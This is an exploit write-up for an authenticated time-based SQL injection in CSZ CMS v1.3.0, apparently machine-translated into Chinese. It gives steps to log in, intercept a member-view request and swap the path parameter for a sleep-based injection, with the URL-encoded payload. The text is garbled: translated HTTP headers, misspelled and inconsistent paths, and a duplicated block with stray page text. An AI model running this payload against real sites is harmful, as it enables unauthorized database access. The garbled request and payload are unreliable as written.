#title: cszcms v1.3.0 -SQL注入(身份验证)
#作者: Abdulaziz Almetaiz
#日期: 27/01/2024
#vendor: https://www.cszcms.com/
#软件: https://sourceforge.net/projects/cszcms/files/install/cszcms-v1.3.0.zip/download
#参考: https://github.com/oh-az
#在: Windows 11,MySQL,Apache测试
#1-登录到管理门户网站
#2-导航到一般菜单成员用户。
#3单击任何用户名旁边的“视图”按钮。
#4拦截请求
get/cszcms/admin/member/view/1 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Cookie: 86112035D26BB3C291899278F9AB4FB2_CSZSESS=N5V1JCDQFJUUO32NG66E4RTTG65UGDSS
升级- 不肯定- requests: 1
#5修改参数
/cszcms/admin/member/view/1
到
/cszcms/admin/member/tiew/'或(睡眠(10))#
和URL编码所有字符
/cszcms/admin/mement/ciew/%27%6F%72%28%73%6C%65%65%70%28%31%30%29%29%29%23%20
#作者: Abdulaziz Almetaiz
#日期: 27/01/2024
#vendor: https://www.cszcms.com/
#软件: https://sourceforge.net/projects/cszcms/files/install/cszcms-v1.3.0.zip/download
#参考: https://github.com/oh-az
#在: Windows 11,MySQL,Apache测试
#1-登录到管理门户网站
正在加载...
localhost
#3单击任何用户名旁边的“视图”按钮。
#4拦截请求
get/cszcms/admin/member/view/1 http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
连接:关闭
Cookie: 86112035D26BB3C291899278F9AB4FB2_CSZSESS=N5V1JCDQFJUUO32NG66E4RTTG65UGDSS
升级- 不肯定- requests: 1
#5修改参数
/cszcms/admin/member/view/1
到
/cszcms/admin/member/tiew/'或(睡眠(10))#
和URL编码所有字符
/cszcms/admin/mement/ciew/%27%6F%72%28%73%6C%65%65%70%28%31%30%29%29%29%23%20
